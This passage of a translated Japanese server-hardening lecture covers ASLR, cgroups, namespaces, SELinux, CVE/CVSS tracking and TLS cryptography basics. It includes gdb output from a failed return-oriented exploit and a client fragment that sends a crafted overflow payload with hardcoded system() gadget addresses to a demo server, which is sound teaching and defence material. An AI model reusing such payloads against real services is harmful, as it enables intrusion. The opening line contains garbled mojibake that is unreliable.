    08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack] 7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar] 7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] $ cat /proc/self/maps 00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack] 7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar] 7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞ΢τΛม͑Δ 1ճ໨ 2ճ໨ ϥΠϒϥϦͷ഑ஔ΋࣮ߦ͢ΔͨͼʹมԽ 7f9e5b63d000-7f9e5b7cc000 7f5e2b2ed000-7f5e2b47c000 system()౳͕ஔ͔Ε͍ͯΔΞυϨε΋ ϥϯμϜʹมԽ͢Δҝ ೚ҙͷίʔυͷ࣮ߦ͕ͱͯ΋೉͘͠ͳΔ
  68. The earlier example that succeeded in running a shell, repeated with ASLR enabled

    $ gdb -q ./tiny_server
    Reading symbols from ./tiny_server...done.
    (gdb) set disable-randomization off
    (gdb) run
    Starting program: /home/fadis/tiny_server_test/tiny_server
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib64/libthread_db.so.1".

    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7931f54 in ?? ()
    (gdb) backtrace
    #0  0x00007ffff7931f54 in ?? ()
    #1  0x00007fffffffd3a0 in ?? ()
    #2  0x00007ffff6f6d350 in ?? ()
    #3  0x00007ffff700e5c0 in ?? ()
    #4  0x00007ffff6f63b90 in ?? ()
    #5  0x0061206863756f74 in ?? ()
    #6  0x0000000000000000 in ?? ()
    (gdb) p &system
    $1 = (<text variable, no debug info> *) 0x7f51c76cd350 <system>
    (gdb) disas 0x7ffff7931f54
    No function contains specified address.

  69. Same gdb session as slide 68, annotated

    system() is not at the address the payload expected:
    0x00007ffff6f6d350 is where system() was located without ASLR (the address baked into the payload),
    0x7f51c76cd350 is where system() was actually located this time.

  70. Same gdb session as slide 68, annotated

    Even before that, the code fragment that was supposed to do the initial pop %rdi is not where it was expected:
    0x00007ffff7931f54 is where pop %rdi; retq sat without ASLR, and "No function contains specified address" shows there is no function there now.

  71. Same gdb session as slide 68, annotated

    As a result, the retq tried to jump into memory that has nothing mapped, and the process died on an out-of-range reference.
    A vulnerability that let the attacker execute arbitrary code has been weakened into one that only lets the attacker cause a denial of service.
  72. Make use of Linux containers

  73. Parent and child processes

    When a process launches another process, the new process becomes a child of the original one.
    [diagram: process --execl("/bin/ls","/bin/ls",nullptr);--> /bin/ls; "launch"; the left side is the parent process, the right side the child process]

  74. Parent and child processes

    init─┬─5*[agetty]
         ├─busybox
         ├─login───bash───top
         ├─sshd─┬─sshd───sshd───bash───pstree
         │      └─sshd───sshd───bash───vim
         └─udevd

    init is started when the system boots. Every process other than init hangs somewhere in a parent-child chain that can be traced back to init.
    For example vim here was started from bash, which was started from sshd, which is a child of init.
  75. cgroups

    init─┬─5*[agetty]
         ├─busybox
         ├─login───bash───top
         ├─sshd─┬─sshd───sshd───bash───pstree
         │      └─sshd───sshd───bash───vim
         └─udevd

    cgroups set limits on the use of system resources for a specified process and all the child processes spawned from it.
    Example: the processes in this subtree may only use the first CPU (cpuset cgroup).
  76. Block I/O cgroup

    Limits I/O to block devices from the specified process group.
    No matter how much spare capacity the storage has, processes inside this group cannot use more I/O bandwidth than the configured amount (a total Mbps limit on the group).

  77. CPU cgroup

    Limits the CPU utilisation of the specified process group.
    No matter how much spare CPU there is, processes inside this group cannot use more CPU than the configured amount (a total limit on the group; the rest stays unused as far as the group is concerned).

  78. cgroups

    There are others as well, such as limits on memory usage and on HugeTLB allocation, but the ones worth attention as a defence against vulnerability exploitation are pids and devices.

  79. PIDs cgroup

    Limits the maximum number of processes that can be created inside the specified process group.
    [diagram: process --execl("/bin/ls","/bin/ls",nullptr);--> /bin/ls; "launch"]
    Because the number of processes in the group has already reached the maximum, creation of the child process is refused.
  80. The client that sends the crafted data (fragment as shown on the slide)

    tcp::socket socket( io_service );
    socket.connect( tcp::endpoint( asio::ip::address::from_string( "127.0.0.1" ), 20000 ) );
    const std::vector< uint8_t > command{
      't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    };
    std::vector< uint8_t > data {
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
      0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
      0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00,
      0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
      0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00,
      0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00
    };
    for( size_t i = 0u; i != 10u; ++i )
      std::copy( command.begin(), command.end(), std::back_inserter( data ) );
    data.push_back( 0x0d );

    system() plus a shell script is the easiest way for an attacker to turn a buffer overrun into execution of arbitrary operations.
    Because system() spawns a child process internally, the attack becomes a great deal more troublesome if child processes cannot be created.
  81. Trying it out

    #include <iostream>
    #include <cstdlib>
    int main() {
      if( system( "ls /" ) == 0 )
        std::cout << "成功" << std::endl;   // "success"
      else
        std::cout << "失敗" << std::endl;   // "failure"
    }

    $ g++ sample.c -o sample
    $ ./sample
    bin dev home lib32 lost+found mnt proc run sys usr boot etc lib lib64 media opt root sbin tmp var
    成功
    $ cgcreate -g pids:test
    $ cgset -r pids.max=1 test
    $ cgexec -g pids:test ./sample
    失敗
    $

    The program lists the contents of the root directory if system() works. Run plainly, the listing appears.
    cgcreate makes a new pids cgroup named test; cgset sets the maximum number of processes inside test to 1.
    Run with cgroup test in effect, system() fails.
  82. However, once this limit is in place, the server cannot create child processes even for its legitimate purpose. This trick is only usable for services that clearly do not need child processes.

  83. devices cgroup

    Restricts which devices may be touched from inside the specified process group.
    [diagram: attacker -> server -> "launch" -> shell, on a vulnerable Linux]
    The attacker has now succeeded in launching a shell as an ordinary user and is trying to obtain root by exploiting a sound-device vulnerability (CVE-2017-15265).
  84. devices cgroup

    Restricts which devices may be touched from inside the specified process group.
    [diagram: attacker -> server -> "launch" -> shell, on a vulnerable Linux; CVE-2017-15265]
    This group should have no need for the sound device, so it is forbidden from touching the sound device. A restriction like this can be put in place in advance.
  85. Namespaces

    Restrict what is visible to a specified process and the child processes spawned from it.

    init─┬─5*[agetty]
         ├─busybox
         ├─login───bash───top
         ├─sshd─┬─sshd───sshd───bash───pstree
         │      └─sshd───sshd───bash───vim
         └─udevd

    Example: the processes in this subtree cannot see the processes outside it (PID namespace).
    bash───vim: from inside this namespace, bash is PID 1; the real PID 1 is init.
  86. Mount namespace

    Separates the information about what is mounted where from the parent process.
    [diagram: parent process and child process, each with its own hoge/fuga tree; /hoge/fuga as seen from the parent, /hoge/fuga as seen from the child]
    Combined with chroot and umount, the existence of the parent process's directory tree can be hidden from the child process.
  87. Mount namespace

    [diagram: attacker looking at a tree containing only hoge/fuga: "there is nothing here I could use for an attack..."]
    By running the server with a directory tree that exposes only the minimum files needed to run it as /, the attacker's options can be narrowed.

  88. UID namespace

    Creates a root that is valid only for the processes belonging to a particular namespace.
    [diagram: attacker: "From now on I am root!"]

  89. UID namespace

    Creates a root that is valid only for the processes belonging to a particular namespace.
    [diagram: attacker: "This is an order from root!" / kernel: "You are root only inside that circle, so no."]

  90. Namespaces

    Beyond these, many other things can be kept separate between the parent process and the child process: network configuration, cgroup configuration, which inter-process communication endpoints can be reached, which file descriptors are open, and so on.

  91. As you may already have noticed,

  92. A Linux container is what you get when cgroups and namespaces are used to completely separate what the parent process and the child process can see and can do.

  93. The popular Docker is what makes it easy to configure this complete separation between parent and child processes. https://www.docker.com/

  94. Containers and microservices

    cgroups and namespaces are configured per process.
    Rather than providing a service with one giant process, building a large service out of servers that each provide a simple function and are connected over the network lets you give each individual process smaller privileges.

  95. Containers and microservices

    With such a structure, even if one of the processes falls into an attacker's hands, the impact at that point can be confined to a limited area of the service.

  96. Be aware, though, that vulnerabilities in cgroups and namespaces themselves are occasionally found that let an attacker escape from the container (example: CVE-…, the identifier did not survive extraction).

  97. Make use of SELinux

  98. Classic *NIX permissions

    File "curry shop info": owner Bob, group Curry Club, permissions: owner and group members may read and write.
    Alice (Curry Club member): "I want to write to that file."
    Linux: "Alice is a group member, and group members may write. OK."
  99. Access control in which users themselves set the permissions needed to access information, as here, is called discretionary access control.

  100. The limits of classic *NIX permissions

    File "curry shop info": owner Bob, group Curry Club, permissions: owner and group members may read and write.
    An attacker claiming to be Bob: "I feel like throwing that file away."
    Linux: "Bob is the file's owner, so a request from Bob must be fine. OK."
  101. The limits of classic *NIX permissions

    File "top secret info": owner Charlie, group Curry Club, permissions: anyone may read and write.
    Charlie: "I don't really get *NIX, just set it to 777."
    Linux: "Charlie is the file's owner, so a request from Charlie must be fine. OK."
  102. Supplementing classic *NIX permissions

    We need mandatory access control, in which the system administrator enforces security requirements across the whole system.
    No matter how sloppy Charlie is, the security of the system as a whole has to be maintained.

  103. Supplementing classic *NIX permissions

    We need access control in a form other than "because you are so-and-so, you may do such-and-such".
    To tell the real Bob apart from an attacker impersonating Bob, "who" is of no use.

  104. Supplementing classic *NIX permissions

    Every process has a parent-child relationship. Bob's processes on some day:
    Bob -> "clean the house" -> "the trash bags ran out, so go and buy some at the convenience store"

  105. Supplementing classic *NIX permissions

    On the way to the convenience store he is caught by a bad guy, who takes his place.
    Bob -> "clean the house" -> "go and buy trash bags at the convenience store" -> [attacker impersonating Bob] -> "scribble in the Curry Club's notebook"
    When a process falls into an attacker's hands, this is the situation you end up in.

  106. Supplementing classic *NIX permissions

    Let's attach a domain to processes.
    Domains are assigned according to rules prepared in advance, are inherited by child processes, and cannot be changed by users who lack the permission to configure SELinux itself.
    [diagram: Bob's process labelled "cleaning", its child also labelled "cleaning"; "this" points at the label]
  107. Supplementing classic *NIX permissions

    Let's attach a domain (type) to resources too: it marks what a process in the "cleaning" domain is allowed to access.
    Users who lack the permission to configure SELinux itself cannot change these either.

  108. Supplementing classic *NIX permissions

    Then the attacker's process looks like this:
    Bob -> "clean the house" (cleaning) -> "go and buy trash bags" (cleaning) -> [attacker impersonating Bob] (still labelled "cleaning") -> "scribble in the Curry Club's notebook"
  109. Supplementing classic *NIX permissions

    Attacker impersonating Bob (domain "cleaning"): "I know I'm cleaning, but let me write in the Curry Club's notebook."
    Linux: "Go and clean."
    Access to the information can be refused on the grounds that the domain does not match.

  110. The important point

    Permission is granted not "because of who you are" but "because of what you are in the middle of doing".

  111. How the two combine

    Bob: "Show me that file."
      classic permissions (the part Bob can configure himself): owner Bob, owner may read and write -> read OK
      AND SELinux: system_u:object_r:passwd_exec_t may be read -> read OK
      overall verdict: read OK

    Bob: "I'd like to use port 8080."
      SELinux: a passwd_exec_t program must not use it -> forbidden
      overall verdict: forbidden
  112. The policy, as shown by sesearch

    $ sesearch --allow …
    allow passwd_t crack_db_t:dir { getattr ioctl lock open read search };
    allow passwd_t crack_db_t:file { getattr ioctl lock open read };
    allow passwd_t default_context_t:dir { getattr open search };
    allow passwd_t device_t:dir { getattr ioctl lock open read search };
    …
    allow passwd_t shadow_t:file { append create getattr ioctl link lock open read relabelfrom relabelto rename setattr unlink write };
    …
    allow passwd_t passwd_exec_t:file { entrypoint execute getattr ioctl lock map open read };
    …
    allow user_t passwd_exec_t:file { execute getattr open read };
    allow user_t passwd_t:process transition;
    …

    From the state of an ordinary user who logged in normally (user_t), commands of type passwd_exec_t may be executed, and a transition into the passwd_t domain is permitted: when a passwd_exec_t command is executed, the process transitions to passwd_t.
    In the passwd_t domain, only what is needed to run passwd can be touched; a passwd_t process can touch the password file of type shadow_t.
  113. Who can reach the password file

    Bob (a user who came in through the regular login procedure): transitions to passwd_t -> passwd, which can touch the password file (shadow_t) but has no access to files unrelated to passwords. Bob himself has no access to shadow_t.
    An attacker impersonating Bob (did not come in through the regular login procedure): has no permission to transition to passwd_t, and no access to shadow_t.
  114. By configuring SELinux appropriately, even if an attacker hijacks a process, the impact can be limited to the domains that can be reached by transition from it.

  115. When SELinux denies an access, a kernel log line like the following appears:

    audit: type=1400 audit(1521959710.081:83): avc: denied { setattr } for pid=2168 comm="chmod" name="shadow" dev="vda" ino=524679 scontext=staff_u:staff_r:staff_t tcontext=system_u:object_r:shadow_t tclass=file

    The command chmod, running in a domain other than passwd_t, tried to rewrite the permissions of the file shadow, which carries the shadow_t type, so the access was denied.
  116. audit: type=1400 audit(1521959710.081:83): avc: denied { setattr } for pid=2168 comm="chmod" name="shadow" dev="vda" ino=524679 scontext=staff_u:staff_r:staff_t tcontext=system_u:object_r:shadow_t tclass=file

    If the software has a legitimate reason to perform this operation:
    create a new domain for that software,
    grant the permission to transition into that domain when the software is used normally,
    and grant that domain the permission for the operations it needs.
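As an added example (not part of the slides), the following Python parses AVC lines of the shape shown above into fields and flags denied accesses to shadow_t coming from any domain other than passwd_t, which is the exact situation the slide describes. The first log line is the slide's; the other two are constructed.

```python
import re
from typing import Dict, List, Optional

# Constructed sample log: line 1 is the denial shown on the slide; lines 2 and 3 are
# made-up variants (a granted access from passwd_t, and a denial in an unrelated domain).
SAMPLE_LOG = """\
audit: type=1400 audit(1521959710.081:83): avc: denied { setattr } for pid=2168 comm="chmod" name="shadow" dev="vda" ino=524679 scontext=staff_u:staff_r:staff_t tcontext=system_u:object_r:shadow_t tclass=file
audit: type=1400 audit(1521959712.500:84): avc: granted { read write } for pid=2200 comm="passwd" name="shadow" dev="vda" ino=524679 scontext=staff_u:staff_r:passwd_t tcontext=system_u:object_r:shadow_t tclass=file
audit: type=1400 audit(1521959720.000:85): avc: denied { name_bind } for pid=2300 comm="httpd" src=8080 scontext=system_u:system_r:httpd_t tcontext=system_u:object_r:http_cache_port_t tclass=tcp_socket
"""

# "avc: denied { perm perm } for key=value key="quoted value" ..."
AVC_RE = re.compile(
    r'avc:\s+(?P<verdict>denied|granted)\s+\{\s*(?P<perms>[^}]*?)\s*\}\s+for\s+(?P<rest>.*)$'
)
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_avc(line: str) -> Optional[Dict[str, object]]:
    """Parse one AVC audit line into a dict; returns None for lines that are not AVC records."""
    m = AVC_RE.search(line)
    if m is None:
        return None
    rec: Dict[str, object] = {'verdict': m.group('verdict'), 'perms': m.group('perms').split()}
    rec.update({k: v.strip('"') for k, v in KV_RE.findall(m.group('rest'))})
    # A context is user:role:type[:level]; the type (domain) is what the policy rules talk about.
    for ctx in ('scontext', 'tcontext'):
        value = rec.get(ctx)
        if isinstance(value, str):
            parts = value.split(':')
            rec[ctx + '_type'] = parts[2] if len(parts) > 2 else ''
    return rec


def parse_log(text: str) -> List[Dict[str, object]]:
    return [r for r in (parse_avc(line) for line in text.splitlines()) if r is not None]


def shadow_denials_outside_passwd(records: List[Dict[str, object]],
                                  allowed_domains=('passwd_t',)) -> List[Dict[str, object]]:
    """Denied attempts on shadow_t files from any domain that is not expected to touch them."""
    return [r for r in records
            if r['verdict'] == 'denied'
            and r.get('tcontext_type') == 'shadow_t'
            and r.get('scontext_type') not in allowed_domains]


if __name__ == '__main__':
    for r in shadow_denials_outside_passwd(parse_log(SAMPLE_LOG)):
        print('pid=%s comm=%s domain=%s perms=%s'
              % (r['pid'], r['comm'], r['scontext_type'], ' '.join(r['perms'])))
```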
  117. The actual SELinux configuration procedure is long, so it is omitted here. How to use the commands and configuration files is well summarised in Red Hat's documentation: https://access.redhat.com/documentation/ja-jp/red_hat_enterprise_linux/7/html/selinux_users_and_administrators_guide/ [slide image: Red Hat's SELinux User's and Administrator's Guide]

  118. When using a distribution other than Red Hat, the system users, the type names and the scope of their permissions may differ. If the distribution you use has its own explanation of SELinux, consult that as well.

  119. How to follow vulnerability information

  120. It is rare that the only thing running on a server is software you wrote yourself.

    [diagram: your own software, on top of a stack of handy libraries, the kernel (OS), drivers and hardware]
  121. It often happens that a vulnerability is found in a part you did not write and your own software stops being safe.

    [diagram: the same stack, with a vulnerability in one of the handy libraries]
  122. Keep an eye on vulnerability information for the third-party software you use.

  123. Common Vulnerabilities and Exposures

    Common vulnerability identifiers, CVE for short. Vulnerabilities found anywhere in the world are assigned a unique ID and collected in a database. http://www.cve.mitre.org/
    [slide image: the top page of the CVE website]
  124. Common Vulnerabilities and Exposures

    The result of searching for "apache": http://www.cve.mitre.org/cve/search_cve_list.html
    [slide image: the CVE website's search results for "apache"]

  125. Common Vulnerabilities and Exposures

    [slide image: NIST's description of the CVE]
    A vulnerability in Apache httpd: when Limit is configured in .htaccess, information that must not be visible remotely may become visible. It is a use-after-free vulnerability, so information that must not be seen is not necessarily what gets sent.
    https://nvd.nist.gov/vuln/detail/CVE-2017-9798
  126. Common Vulnerability Scoring System

    https://nvd.nist.gov/vuln/detail/CVE-2017-9798
    The common vulnerability scoring system (CVSS for short) expresses how bad a vulnerability is as a number. Looking at it tells you roughly how bad things are even without understanding how the vulnerability works.
    [slide image: the CVSS section of the CVE entry]
  127. Common Vulnerability Scoring System

    Base Metrics: a score based on the characteristics of the vulnerability itself. The higher this value, the bigger the hole in the target.
    Temporal Metrics: a score based on the state of the response to the vulnerability. This value changes as the situation changes.
    Environmental Metrics: a score based on the size of the impact if the vulnerability is exploited. This value depends on the environment in which the target is used.
  128. Common Vulnerability Scoring System

    (Same three metric groups as slide 127.)
    [slide image: the CVSS section of the CVE entry]
    The Base Metrics score, which does not depend on time or place, is what gets published as vulnerability information.
  129. Base Metrics

    Access Vector: from where does the attacker have to mount the attack? Local / same network segment / from anywhere on the network.
    Access Complexity: is it hard to get into a state where the attack works? Only when a special configuration is in use / the attacker must know something in advance.
    Privileges Required: how much privilege is needed to carry out the attack? Ordinary user privileges / administrator privileges.
  130. Base Metrics

    User Interaction: does a legitimate user have to be made to do something for the attack to succeed? For example, the user must be made to open a crafted Web page.
    Scope: can the attack be used as a foothold for attacking components other than the one attacked? Cross-site scripting and the like fall under this.

  131. Base Metrics

    Integrity Impact: can the attacker tamper with the target's information? The information that can be tampered with may include confidential information.
    Availability Impact: can the attacker stop the service? Some functions can be stopped / the service can be stopped completely.
    Confidentiality Impact: does information the attacker must not see become visible? The information that becomes visible may include confidential information.
  132. The case of Apache httpd vulnerability CVE-2017-9798

    [slide image: the CVSS section of the CVE entry]
    Attackable over the network; the attack is easy; no particular privileges are needed; the user need not be made to do anything; it is not a foothold for attacking other components; confidential information leaks; information cannot be tampered with; availability cannot be harmed.
    Severity: 7.5/10.0 (High). A fairly nasty one, so plug it sooner rather than later.
    https://nvd.nist.gov/vuln/detail/CVE-2017-9798
  133. The case of BIND vulnerability CVE-2016-2776

    [slide image: the CVSS section of the CVE entry]
    Attackable over the network; the attack is easy; no particular privileges are needed; the user need not be made to do anything; it is not a foothold for attacking other components; no information leaks; information cannot be tampered with; availability can be lost completely.
    Severity: 7.5/10.0 (High). A fairly nasty one, so plug it sooner rather than later.
    https://nvd.nist.gov/vuln/detail/CVE-2016-2776
  134. The case of Firefox vulnerability CVE-2016-5253

    [slide image: the CVSS section of the CVE entry]
    Attackable only locally; the attack is not easy; ordinary user privileges are required; the user need not be made to do anything; it is not a foothold for attacking other components; no information leaks; confidential information can be tampered with; availability cannot be harmed.
    Severity: 4.7/10.0 (Medium). Certainly a vulnerability, but it does not look like a nasty one.
    https://nvd.nist.gov/vuln/detail/CVE-2016-5253
  135. When a high-severity vulnerability is found, each distribution publishes information on how to plug it.
    https://access.redhat.com/security/cve/cve-2016-2776
    https://security-tracker.debian.org/tracker/CVE-2016-2776
    [slide images: Red Hat's and Debian's vulnerability information pages]

  136. What to do when

    A CVE ID has been assigned to a vulnerability in software you use: search the Web for details about that ID.
    Details of a vulnerability in software you use have been published: look at the CVSS and assess the impact.
    The distribution is slow to ship a fix for a serious vulnerability: read the details and consider whether you can keep providing the service while avoiding the affected feature.
    The distribution has shipped a fix for a serious vulnerability: update as soon as possible.

  137. Preparing for attacks on communication

  138. [diagram: Alice, WiFi, the Internet, the remote endpoint] Alice connects to the hotel's WiFi access point.

  139. [diagram: Alice, WiFi, the Internet, the remote endpoint, a malicious third party]

    Alice connects to the hotel's WiFi access point.
    Alice: "Where should I send traffic to get out?" (DHCP DISCOVER)
    Malicious third party: "Over here!" (DHCP OFFER)
  140. [diagram: Alice's data flow now passes through the malicious third party on its way to the Internet] An attack like this is called DHCP spoofing.

  141. There are several ways for a malicious third party to get in the middle, and the remote endpoint has no way to prevent such a situation in advance. Communication over the Internet therefore has to be conducted on the assumption that there is a malicious third party in between.

  142. The Internet is a game of telephone

    To reach a distant host, traffic may pass through many hosts. The number of hosts passed through is called the hop count (1 hop, 2 hops, ... 5 hops to the remote endpoint).

  143. The Internet is a game of telephone

    Every host on the communication path can see the content of the communication in the clear.

  144. The Internet is a game of telephone

    A malicious third party on the path might not pass the content on correctly to the next host.

  145. The Internet is a game of telephone

    A malicious third party on the path might impersonate the intended peer.
    Alice: "Are you Bob?" Charlie (in the middle): "Yes, I'm Bob."

  146. To be unaffected by a malicious third party on the path:

    encrypt the content of the communication;
    verify that the content has not been tampered with.

  147. Symmetric-key cipher

    plaintext  "Hello, World!\n" = 48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 21 0a
      -- transform using the key -->
    ciphertext 38 98 11 8f 0b 6e 39 6e ff ba 16 4d e6 52 2b
      -- inverse transform using the key -->
    plaintext  "Hello, World!\n" = 48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 21 0a

    Ciphers differ in how they perform the transformation; several cipher algorithms exist.
  148. What makes a good symmetric-key cipher

    Trying every key is infeasible in realistic time (this can be achieved by making the key long enough), and no method of breaking it exists that is more efficient than trying every key (this is the part that is hard to prove).

  149. A cipher whose algorithm is widely used and for which no efficient attack has been found despite that can be considered safe, at least for now. If you make up your own cipher algorithm, satisfying this part becomes hard. Therefore rolling your own cipher cannot be recommended: adopt an existing cipher algorithm that meets the conditions above.

  150. Symmetric-key ciphers for which trying every key is infeasible in realistic time, and which are widely used but for which no efficient attack has been found

    Block ciphers: Advanced Encryption Standard (AES), Blowfish, and so on
    Stream ciphers: ChaCha20
  151. The key distribution problem of symmetric-key ciphers

    To exchange encrypted messages you need a key, but when the same key is used for encryption and decryption, you cannot hand the key to the peer over a channel that may be eavesdropped. If a malicious third party knows the key, the encryption is pointless. [diagram: Alice, Bob]

  152. To be unaffected by a malicious third party on the path:

    encrypt the content of the communication;
    verify that the content has not been tampered with;
    share the encryption key without a malicious third party learning it (NEW!).

  153. Public-key cryptography

    A cipher algorithm that uses different keys for encryption and decryption.
    The public key, needed for encryption, is sent to the peer; the peer uses the public key to encrypt the message it wants to send to the key's owner.
    Even if someone eavesdropped on the public key, they cannot decrypt the communication with it. The private key, needed for decryption, is never given to anyone else.
  154. Public-key cryptography

    Toy example from the slide: public key = 15, private key = -15; plaintext 42 encrypts as 42+15=57 and decrypts as 57-15=42.
    With a cipher like this the private key is revealed from the public key instantly.
    The public key must be easy to derive from the private key, but the private key must not be easy to derive from the public key.
  155. RSA

    The public key must be easy to derive from the private key, but the private key must not be easy to derive from the public key.
    That 373*61=22753 is easy to compute, but no method is known for finding that 22753 splits into 373 and 61 with comparable ease: prime factorisation is required.
    By building the key through a computation whose cost is asymmetric like this, one can make a key for which deriving the private key from the public key requires an enormous amount of computation.

  156. RSA

    #!/usr/bin/env python3
    # -*- coding: utf-8 -*-

    def egcd( x, y, a = 0, b = 1 ):
      # extended Euclid: returns ( gcd( x, y ), coefficient of x )
      div, mod = divmod( x, y )
      if mod == 0:
        return ( y, a )
      return egcd( y, mod, b - div * a, a )

    def modinv( x, y ):
      # modular inverse of x modulo y
      a, b = egcd( x, y )
      if a != 1:
        raise Exception( 'no modinv' )
      return b % y

    def generate_key_pair():
      prime_nums = [ 116903, 215443, 139721 ]
      # public key = ( n = p * q, e ); private key d = e^-1 mod ( p - 1 )( q - 1 )
      public_key = [ prime_nums[ 0 ] * prime_nums[ 1 ], prime_nums[ 2 ] ]
      private_key = modinv( public_key[ 1 ], ( prime_nums[ 0 ] - 1 ) * ( prime_nums[ 1 ] - 1 ) )
      return ( public_key, private_key )

    public_key, private_key = generate_key_pair()
    print( '秘密鍵:\t%d' % private_key )
    print( '公開鍵:\t%d,%d' % ( public_key[ 0 ], public_key[ 1 ] ) )
    plain = 0x686f6765
    print( '原文:\t%X' % plain )
    crypted = pow( plain, public_key[ 1 ], public_key[ 0 ] )
    print( '暗号化:\t%X' % crypted )
    decrypted = pow( crypted, private_key, public_key[ 0 ] )
    print( '復号:\t%X' % decrypted )

    $ ./crypto.py
    秘密鍵: 15753325457
    公開鍵: 25185933029,139721
    原文:   686F6765
    暗号化: 2779B8996
    復号:   686F6765
  157. RSA (same program and output as slide 156)

    The function that counts the natural numbers from 1 up to n-1 that are coprime to an integer n is called Euler's totient function φ(n).
    By the definition of a prime, when n is prime φ(n) is n-1.
    It is known that φ(ab)=φ(a)φ(b).
    When a and b are known, φ(ab) can be computed in constant time, but when only ab is known, computing φ(ab) takes exponential time.
    This asymmetry is what makes it hard to derive the private key from the public key.
  158. Factoring the public key leads to the private key. It is not easy, but it can be done in less time than brute-forcing the key.

  159. Prime factorisation takes longer the larger the number is, so using numbers too large to factor in realistic time as keys prevents the private key from being exposed.
    For RSA it is known that keys of 768 bits or less can have their private key recovered in realistic time; such old keys must be replaced with longer ones.
    The key length of a public-key cipher is decided by the time factorisation takes.

  160. Man-in-the-middle attack

    We have ended up able to communicate securely with the malicious third party!
    Alice: "Are you Bob?" Charlie: "Yes, I'm Bob."
    We have to verify that the peer is genuine.

  161. To be unaffected by a malicious third party on the path:

    encrypt the content of the communication;
    confirm that the peer is genuine (NEW!);
    verify that the content has not been tampered with;
    share the encryption key without a malicious third party learning it.

  162. Certificate authorities

    [diagram: Bob, the certificate authority, a server certificate]
    The certificate authority confirms by physical means that it is really Bob and issues the private key; the other party obtains the public key from the server certificate.
    Data encrypted with the public key can be read only by the real Bob.
    If for whatever reason Bob's private key falls into someone else's hands, the certificate authority revokes that key.
  163. Transport Layer Security

    TLS for short; it used to be called SSL. A standard for building a channel that has these capabilities: encrypt the content; confirm that the peer is genuine; verify that the content has not been tampered with; share the encryption key without a malicious third party learning it.
    It is standardised in RFCs [1] and implementations such as OpenSSL exist. Because which ciphers are safe changes with the times, TLS supports a variety of cryptographic techniques.
    [1] https://www.ietf.org/rfc/rfc5246.txt
  164. Transport Layer Security

    [diagram: application that communicates -> TLS -> TCP/IP -> data link layer -> physical layer]
    An application that uses TLS hands its communication data to TLS. TLS confirms the peer and shares the key, then sends the data, encrypted and with a hash attached, into the TCP/IP socket.
    By building the application on top of TLS, you no longer have to implement the troublesome cryptographic parts yourself.
  165. TLS using RSA

    [diagram: Alice and Bob] Alice obtains the public key; Alice generates a random number n; Alice sends n encrypted with the public key; the genuine peer can extract n with the private key; both derive the symmetric key from n; communication then proceeds encrypted with the symmetric-key cipher.
    Because the value encrypted with a valid public key could be shared by both sides, the symmetric key is in a state of being shared only with the intended peer.
  166. TLS using RSA

    (Same exchange as slide 165.)
    Suppose a third party is recording the communication at this time. At this point neither the symmetric-key cipher's key nor the private key is known, so the third party cannot learn the content of the communication.
  167. (Same exchange as slide 165.)

    If later, for whatever reason, the private key becomes public, the third party can extract the symmetric key from the recorded communication and learn the content of all of it.
  168. Forward secrecy

    (Same exchange as slide 165.)
    Forward secrecy means that even if the private key of the server certificate is exposed after the communication took place, the content of the communication that happened up to then is not exposed.
    Sending the seed of the shared key to the peer with RSA cannot achieve forward secrecy: once the private key becomes public, the third party extracts the symmetric key from the recorded communication and learns all of its content.
  169. The discrete logarithm problem

    G = x^a mod p (where p is prime and 2 ≤ a < p)
    In an expression of this form, G can be computed from x, a and p in logarithmic time, but finding a from x, G and p takes exponential time.
    In particular, when p is a huge prime, a can no longer be found in realistic time.
  170. Diffie-Hellman key agreement

    G = x^a mod p (where p is prime and 2 ≤ a < p)
    In an expression of this form, G can be computed from x, a and p in logarithmic time, but finding a from x, G and p takes exponential time. In particular, when p is a huge prime, a can no longer be found in realistic time.
    This asymmetry is used so that the key cannot easily be found from the information visible on the communication path alone.
  171. Diffie-Hellman key agreement

    Alice generates a random a; Bob generates a random b.
    Alice sends Ga = x^a mod p; Bob sends Gb = x^b mod p.
